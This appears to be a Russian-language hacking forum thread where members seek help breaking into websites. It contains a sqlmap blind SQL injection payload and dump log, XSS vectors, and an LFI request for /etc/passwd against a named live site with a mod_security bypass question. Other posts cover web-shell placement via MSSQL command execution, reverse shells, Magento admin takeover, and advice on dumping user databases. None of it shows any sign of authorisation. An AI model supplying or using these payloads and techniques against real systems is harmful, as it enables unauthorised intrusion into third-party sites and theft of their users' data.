Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Parameter: useremail (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
    Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать(<blank> везде)
    Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
    [ERROR] invalid character detected. retrying..
    [WARNING] increasing time delay to 4 seconds
     
  2. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    если есть такое, вполне возможно есть и другие скули, поищите хорошо.
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,549
    Reputations:
    40
    Oob
     
  4. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Если это ответ,то можно поподробней=)
     
  5. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Пара разных пейлоадов,пробовал через оба,но итог один и тот же
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,549
    Reputations:
    40
  7. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    ищи скули с вектором error based/Union если тебе слить нужно базу пользователей, через слепую сливать смысла нет. Проверяй файлы, POST/GET запросы, скрытые папки, всегда есть надежда на то что есть.
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,549
    Reputations:
    40
    Не т, не защитит опенСервер. Он вообще для другого. Остальной текст я не понял.
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Нужно залиться в магенто2 не самой свежей версии. Имея админку, пхпмуадмин с корректными данными, локальную читалку, и стандартный набор модулей, есть какие нибудь варианты?
     
  10. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Есть сайт на Laravel есть вроде XSS хранимая, <b> и другие теги пропускает а <script> меняет на [removed] пробовал много векторов, помогите приватно
     
  11. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    869
    Reputations:
    198
    _________________________
  12. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,549
    Reputations:
    40
    Вроде можно без скрипт вызвать алерт
     
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Есть XSS но этот URL Encode все портит, что можно сделать?
    URL: https://site/news/asd?fbclid='-alert(1)//
    Code:
    onclick="Share.vk('https://site/news/asd?fbclid=%27-alert(1)//')"
     
  15. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    И так ситуация:

    Есть выполнение команд в базе mssql и выврд через тайм инжекшн. ОС windows
    можно выполнять команды cmd. Там есть IIS и папка wwwroot. Но как узнать IP адрес внешний,чтобы обратиться к www, web-шеллу? как узнать внешний ИП на котором стоит mssql?
     
  16. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    181
    Likes Received:
    533
    Reputations:
    78
    проскань подсеть на 1433 порт но это не факт
    раз есть возможность выполнять команды - пропингуй себя в логах потом смотри ip(тоже не точно)
    можно залить обратный шелл и никуда обращаться не нужно будет - тоже не факт
    можно попробовать прочитать скрипты, там должна быть инфа для подключения к базе(а может и нет)
     
    #2656 Baskin-Robbins, 22 Jul 2019
    Last edited: 22 Jul 2019
    seostock likes this.
  17. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Подскажите как обойти mod security для LFI
    Code:
    http://www.manyforex.com/page.php?X=....//etc/passwd&C=ID-000013&Y=ID-00001223&Z=Particular&Q=MANYForex
     
  18. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Есть интересный скуль, но когда пробую вытянуть таблицы выдается ошибка, что у юзера бд нет прав:
    Code:
    SELECT command denied to user 'user'@'localhost' for table 'tables'
    Кто то сталкивался с таким? Eсть ли какие то варианты продвинуться дальше?
     
  19. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    88
    Reputations:
    7
    попробуй пробрутить
     
  20. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Чеп прикрыть USB технике что в офисе, не разбирая, не испортив?
     
Loading...